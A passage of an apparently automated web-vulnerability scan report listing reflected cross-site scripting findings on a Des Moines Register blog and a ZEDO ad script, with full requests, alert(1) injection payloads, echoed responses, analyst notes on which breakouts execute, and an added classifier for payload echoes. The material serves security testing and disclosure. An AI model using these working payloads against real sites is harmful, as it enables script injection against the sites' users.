Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69691

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html36671";alert(1)//1caaebcb5b0","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...
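
The "echoed as" wording in these findings reflects a comparison a retest has to make too: the payload travels URL-encoded (%3b), the server decodes it, and the question is whether the decoded value came back byte-for-byte or was encoded for its context. The following is an added example (not the scanner's code) that performs that comparison and classifies the result; the response fragments it runs over are constructed to mirror the captured 1.128 response and three hypothetical fixed or filtered variants of it, and the function names and category labels are assumptions.

```javascript
// Added example, not code from the scanner or the affected site. Reproduces
// the "echoed as" comparison behind a reflected-XSS finding: URL-decode the
// submitted payload, look for it in the body, and work out which encoding, if
// any, the application applied to it.

// Typical encoders a fixed page would use, so their output can be recognised.
function htmlEncode(s) {
  return s.replace(/&/g, '&amp;').replace(/"/g, '&quot;').replace(/'/g, '&#x27;')
          .replace(/</g, '&lt;').replace(/>/g, '&gt;');
}
function jsEscape(s) {
  // A JS-string encoder emits what JSON.stringify does, minus the quotes.
  return JSON.stringify(s).slice(1, -1);
}

// Returns one of:
//   'unmodified'   decoded payload present verbatim (the scanner's finding)
//   'html-encoded' present with HTML entities
//   'js-escaped'   present with backslash escapes
//   'url-encoded'  present percent-encoded
//   'partial'      both canaries survive but the breakout characters did not
//   'absent'       no trace of the payload
function classifyEcho(body, submittedPayload) {
  const decoded = decodeURIComponent(submittedPayload);
  if (body.includes(decoded)) return 'unmodified';
  if (body.includes(htmlEncode(decoded))) return 'html-encoded';
  if (body.includes(jsEscape(decoded))) return 'js-escaped';
  if (body.includes(submittedPayload) || body.includes(encodeURIComponent(decoded))) {
    return 'url-encoded';
  }
  // The scanner brackets its breakout characters with a 5-hex and an 11-hex
  // canary; if both survive but the middle did not, something filtered it.
  const m = decoded.match(/^([0-9a-f]{5})(.*)([0-9a-f]{11})$/);
  if (m && body.includes(m[1]) && body.includes(m[3])) return 'partial';
  return 'absent';
}

// Constructed response fragments modelled on the 1.128 capture (not the live
// responses): the vulnerable echo and three variants a fixed or filtering
// server might return.
const SUBMITTED = '36671"%3balert(1)//1caaebcb5b0';
const SAMPLES = {
  unmodified:  'response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html36671";alert(1)//1caaebcb5b0","ContentLength":0}',
  jsEscaped:   'response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html36671\\";alert(1)//1caaebcb5b0","ContentLength":0}',
  htmlEncoded: '<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/login.html36671&quot;;alert(1)//1caaebcb5b0" />',
  partial:     '"Url":"http://blogs.desmoinesregister.com/login.html36671alert11caaebcb5b0"',
};

// Stand-alone run: classify every constructed sample.
function demo() {
  const out = {};
  for (const [name, body] of Object.entries(SAMPLES)) out[name] = classifyEcho(body, SUBMITTED);
  return out;
}
```

Only the 'unmodified' outcome supports a finding like the ones in this report; the classifier says nothing about the context the value landed in, which still has to be read off the response (attribute value, string literal, text node) to judge whether the reflection is exploitable.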

1.129. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fc42"%3balert(1)//d198b406e30 was submitted in the REST URL parameter 5. This input was echoed as 9fc42";alert(1)//d198b406e30 in the application's response.

Same sink as 1.128 (the "Url" member of the semantics object on the 404 page), reached through signup.html; the same caveat applies, since the // comment removes the closing brace of the object literal and the captured script would not parse as shown.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.html9fc42"%3balert(1)//d198b406e30 HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69695

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...

       requires:[],
       type: 'script'}
   );
})();
/*GO4 Faster Semantics*/
   GEL.thepage.pageinfo.semantics={
   response:{"Url":"http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html9fc42";alert(1)//d198b406e30","ContentLength":0,"FetchDuration":5100,"ContentType":"","Id":0,"PathIds":0,"LanguageId":"","Channels":[],"UnconStatus":9},
   source:'CW',
   enabled:true,
   status:'',
   url:'http://cx.contextweb.com/
...[SNIP]...

1.130. http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://blogs.desmoinesregister.com
Path:   /odygel/lib/userauth/content/signup.html

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d8"><script>alert(1)</script>8108b2c0f8b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

Same sink as 1.126 (the 404 error page's canonical link), reached through signup.html.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b HTTP/1.1
Host: blogs.desmoinesregister.com
Proxy-Connection: keep-alive
Referer: http://blogs.desmoinesregister.com/dmr/index.php/2011/02/11/daniels-at-cpac-calls-for-broad-civil-conservative-coalition/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anonId=44754709-9119-4062-9c0e-f4c8a41d42ed; GCIONSN=AAAAOn52dzox; s_cc=true; s_sq=%5B%5BB%5D%5D; SiteLifeHost=gnvm25l3pluckcom

Response

HTTP/1.1 404 Not Found
Date: Mon, 14 Feb 2011 01:38:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Cache-Control: must-revalidate
Content-Type: text/html; charset=UTF-8
Content-Length: 69771

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">


<head>
<title>Error | The Des Moines Register | DesMoinesRegister.com </title
...[SNIP]...
<link rel="canonical" href="http://blogs.desmoinesregister.com/odygel/lib/userauth/content/signup.htmld94d8"><script>alert(1)</script>8108b2c0f8b" />
...[SNIP]...

1.131. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14989'%3balert(1)//2a3dc6422b2 was submitted in the $ parameter. This input was echoed as 14989';alert(1)//2a3dc6422b2 in the application's response.

Sink: the zzPat assignment in the returned script, where the $ value is appended after a comma inside a single-quoted literal on one line: var zzPat=',14989';alert(1)//2a3dc6422b2';var zzCustom='';. The quote closes the literal, alert(1) becomes a statement of its own, and // comments out the rest of that line (including the zzCustom assignment). Nothing else on the line is left unbalanced, so the script parses and the injected code runs as shown when the page includes fm.js.

Note also the Set-Cookie header in the response: the same value is written into the FFpb cookie. Because a semicolon separates cookie attributes, a browser stores only 305:14989' from that header, but it shows the parameter reaches a cookie sink in addition to the script body.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=14989'%3balert(1)//2a3dc6422b2&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:14989';alert(1)//2a3dc6422b2;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',14989';alert(1)//2a3dc6422b2';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,14989';alert(1)//2a3dc6422b2;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.132. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e66f0"%3balert(1)//c0290daf8fd was submitted in the $ parameter. This input was echoed as e66f0";alert(1)//c0290daf8fd in the application's response.

Here the single-quoted zzPat literal is not affected (a double quote inside single quotes is just a character); the breakout is in the double-quoted zzStr literal on the following line: var zzStr="q=,e66f0";alert(1)//c0290daf8fd;z="+Math.random();}. Caveat: the // comment also swallows the } that closes the enclosing if block, so unless a later brace happens to balance it the whole script fails to parse and alert(1) never runs. The reflection is unencoded either way; confirm execution in a browser before relying on this instance.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=e66f0"%3balert(1)//c0290daf8fd&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=305:e66f0";alert(1)//c0290daf8fd;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=64
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4248

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat=',e66f0";alert(1)//c0290daf8fd';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,e66f0";alert(1)//c0290daf8fd;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                                                                       
...[SNIP]...

1.133. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8aacb'%3balert(1)//355b6461f7f was submitted in the l parameter. This input was echoed as 8aacb';alert(1)//355b6461f7f in the application's response.

The reflection visible in the captured excerpt sits inside the src attribute of an iframe tag that the script emits; the delimiter of the JavaScript string enclosing that markup lies outside the excerpt, so the breakout cannot be confirmed from what is shown here. Check the full response for the string that wraps the iframe markup.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D8aacb'%3balert(1)//355b6461f7f&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=63
Expires: Mon, 14 Feb 2011 01:30:24 GMT
Date: Mon, 14 Feb 2011 01:29:21 GMT
Connection: close
Content-Length: 4217

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=916;var zzPat='';var zzC
...[SNIP]...
ADYAAHrQ5V4AAACH~010411%3Bp%3D8%3Bf%3D749621%3Bh%3D749620%3Bo%3D20%3By%3D67%3Bv%3D1%3Bt%3Di%3Bk=http://media2.legacy.com/adlink/5306/1804573/0/170/AdId=1437456;BnId=1;itime=646950193;nodecode=yes;link=8aacb';alert(1)//355b6461f7f" frameborder=0 marginheight=0 marginwidth=0 scrolling="no" allowTransparency="true" width=300 height=250>
...[SNIP]...

1.134. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c7.zedo.com
Path:   /bar/v16-401/c5/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0b04'%3balert(1)//36d8d5a78d7 was submitted in the q parameter. This input was echoed as c0b04';alert(1)//36d8d5a78d7 in the application's response.

Same zzPat sink as 1.131, fed from q rather than $ and without the leading comma. The line stays syntactically valid after the // comment, so this instance executes as shown.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/c5/jsc/fm.js?c=2942/2941/1&a=0&f=&n=305&r=13&d=9&q=c0b04'%3balert(1)//36d8d5a78d7&$=&s=916&l=http%3A//media2.legacy.com/adlink/5306/1804573/0/170/AdId%3D1437456%3BBnId%3D1%3Bitime%3D646950193%3Bnodecode%3Dyes%3Blink%3D&z=0.16725402581505477 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.1.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=8306749451
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=305,2942,9:305,4506,17:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=65
Expires: Mon, 14 Feb 2011 01:30:25 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 4245

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
